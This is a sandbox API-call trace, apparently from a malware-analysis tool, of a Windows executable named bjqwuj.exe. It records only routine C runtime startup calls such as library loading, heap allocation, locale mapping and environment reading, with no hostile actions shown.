# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 24.07.2020 13:23:49.339 Process: id = "1" image_name = "bjqwuj.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.exe" page_root = "0x4037e000" os_pid = "0xa98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa8c [0044.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afd24 | out: lpSystemTimeAsFileTime=0x2afd24*(dwLowDateTime=0xc12f1da0, dwHighDateTime=0x1d661bd)) [0044.938] GetCurrentThreadId () returned 0xa8c [0044.938] GetCurrentProcessId () returned 0xa98 [0044.938] QueryPerformanceCounter (in: lpPerformanceCount=0x2afd1c | out: lpPerformanceCount=0x2afd1c*=16533855608) returned 1 [0045.016] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0045.016] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.016] GetLastError () returned 0x57 [0045.016] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.016] GetLastError () returned 0x57 [0045.016] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0045.017] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0045.017] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.017] GetLastError () returned 0x57 [0045.018] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0045.018] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0045.018] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.018] GetLastError () returned 0x57 [0045.018] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.018] GetLastError () returned 0x57 [0045.018] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0045.018] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0045.018] GetProcessHeap () returned 0x570000 [0045.018] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.018] GetLastError () returned 0x57 [0045.019] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0045.019] GetLastError () returned 0x57 [0045.019] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0045.019] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0045.019] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x364) returned 0x584600 [0045.019] SetLastError (dwErrCode=0x57) [0045.019] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xe00) returned 0x584970 [0045.021] GetStartupInfoW (in: lpStartupInfo=0x2afc5c | out: lpStartupInfo=0x2afc5c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xadcc50, hStdOutput=0x1903e61e, hStdError=0xfffffffe)) [0045.021] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0045.021] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0045.021] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0045.021] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\" " [0045.021] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\" " [0045.021] GetACP () returned 0x4e4 [0045.022] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x220) returned 0x585f78 [0045.022] IsValidCodePage (CodePage=0x4e4) returned 1 [0045.022] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2afc7c | out: lpCPInfo=0x2afc7c) returned 1 [0045.022] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af544 | out: lpCPInfo=0x2af544) returned 1 [0045.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afb58, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afb58, cbMultiByte=256, lpWideCharStr=0x2af2e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⢀®Ā") returned 256 [0045.022] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⢀®Ā", cchSrc=256, lpCharType=0x2af558 | out: lpCharType=0x2af558) returned 1 [0045.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afb58, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afb58, cbMultiByte=256, lpWideCharStr=0x2af298, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0045.022] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.022] GetLastError () returned 0x57 [0045.022] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0045.022] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0045.023] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x2af088, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0045.023] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x2afa58, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x02à\x87\x19\x94ü*", lpUsedDefaultChar=0x0) returned 256 [0045.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afb58, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afb58, cbMultiByte=256, lpWideCharStr=0x2af2b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䘽®Ā") returned 256 [0045.023] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䘽®Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0045.023] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䘽®Ā", cchSrc=256, lpDestStr=0x2af0a8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0045.023] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x2af958, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x02à\x87\x19\x94ü*", lpUsedDefaultChar=0x0) returned 256 [0045.023] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x80) returned 0x5861a0 [0045.023] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2afaa0, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.exe")) returned 0x30 [0045.023] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0045.023] AreFileApisANSI () returned 1 [0045.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0045.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", cchWideChar=-1, lpMultiByteStr=0xbce5c8, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", lpUsedDefaultChar=0x0) returned 49 [0045.023] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x39) returned 0x586228 [0045.023] RtlInitializeSListHead (in: ListHead=0xbce4e0 | out: ListHead=0xbce4e0) [0045.024] GetLastError () returned 0x0 [0045.024] SetLastError (dwErrCode=0x0) [0045.024] GetEnvironmentStringsW () returned 0x586270* [0045.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x565) returned 0x586d48 [0045.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x586d48, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0045.024] FreeEnvironmentStringsW (penv=0x586270) returned 1 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x98) returned 0x586270 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1f) returned 0x585e20 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x586310 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x37) returned 0x586350 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x586390 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0x5863d8 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0x586418 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x586438 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x14) returned 0x586468 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd) returned 0x57ee68 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x25) returned 0x586488 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x39) returned 0x5864b8 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0x586500 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0x586520 [0045.024] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xe) returned 0x57ee80 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x69) returned 0x586540 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0x5865b8 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1b) returned 0x585e48 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1d) returned 0x585e70 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x586600 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x586650 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0x586670 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1b) returned 0x585e98 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x586690 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x29) returned 0x5866c0 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x585ec0 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x41) returned 0x5866f8 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0x586748 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xf) returned 0x57ee98 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x16) returned 0x586768 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x586788 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x29) returned 0x5867c0 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x15) returned 0x5867f8 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x585ee8 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x586818 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x586850 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0x586870 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x46) returned 0x586890 [0045.025] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x586d48 | out: hHeap=0x570000) returned 1 [0045.025] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x800) returned 0x5868e0 [0045.025] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 